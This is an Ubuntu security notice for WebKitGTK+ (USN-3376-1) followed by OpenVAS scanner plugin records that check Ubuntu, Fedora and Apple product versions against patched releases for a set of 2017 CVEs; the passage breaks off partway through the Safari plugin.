ID: USN-3376-1
Type: ubuntu
Reporter: Ubuntu
Modified: 2017-08-02T00:00:00
Description
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
{"openvas": [{"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-2538", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-03T00:00:00", "id": "OPENVAS:1361412562310843266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843266", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3376-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3376_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3376-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843266\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-03 07:16:13 +0200 (Thu, 03 Aug 2017)\");\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\",\n \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\",\n \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\",\n \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3376-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. 
If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.04,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3376-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3376-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = 
isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310873180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873180", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_24bddb96b5_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as 
published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873180\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:40 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5WQG4TVFXCPDMB3M6X46ISBMRZAHJZ43\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310873200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873200", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_73d6a0dfbb_webkitgtk4_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you 
can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873200\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:46:47 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n 
script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YOV6OOFLOHZALSKLNVHTQVXB43SXE5LW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-08T00:00:00", "id": "OPENVAS:1361412562310873226", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873226", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9d572cc64a_webkitgtk4_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This 
program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873226\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:36:34 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", 
value:\"2017-9d572cc64a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VIXDC655D7574NMXWPNXAFDI2JHBTWZR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:20:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811252", "type": "openvas", "title": "Apple iCloud Multiple Vulnerabilities-HT207921 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Multiple 
Vulnerabilities-HT207921 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811252\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-7010\", \"CVE-2017-7013\", \"CVE-2017-7018\", \"CVE-2017-7020\",\n \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\",\n \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\", \"CVE-2017-7043\",\n \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7049\", \"CVE-2017-7064\",\n \"CVE-2017-7019\", \"CVE-2017-7012\");\n script_bugtraq_id(99889, 99879, 99885, 99890);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 12:15:28 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple iCloud Multiple Vulnerabilities-HT207921 (Windows)\");\n\n 
script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An out-of-bounds read in libxml2.\n\n - Multiple memory corruption issues in WebKit.\n\n - A memory initialization issue in WebKit.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code and gain access to potentially sensitive\n information.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 6.2.2\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 6.2.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207927\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!icVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## 6.2.2 = 6.2.2.39\nif(version_is_less(version:icVer, test_version:\"6.2.2.39\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"6.2.2\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-03T20:37:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", 
"CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "modified": "2020-02-28T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811535", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811535", "type": "openvas", "title": "Apple iTunes Multiple Vulnerabilities-HT207928 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Multiple Vulnerabilities-HT207928 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811535\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2017-7053\", \"CVE-2017-7010\", \"CVE-2017-7013\", \"CVE-2017-7018\",\n \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\",\n \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\",\n \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7049\",\n \"CVE-2017-7064\", \"CVE-2017-7019\", \"CVE-2017-7012\");\n script_bugtraq_id(99884, 99889, 99879, 99885, 99890);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 11:40:40 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple iTunes Multiple Vulnerabilities-HT207928 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Multiple memory corruption issues in WebKit component.\n\n - A memory initialization issue in WebKit component.\n\n - An out-of-bounds read error in libxml2 component.\n\n - An access issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will 
allow remote\n attackers to execute arbitrary code and disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.6.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.6.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207928\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\n# vulnerable versions, 12.6.2 = 12.6.2.20\nif(version_is_less(version:vers, test_version:\"12.6.2.20\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"12.6.2\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-07-20T00:00:00", "id": 
"OPENVAS:1361412562310811251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811251", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities-HT207921", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities-HT207921\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 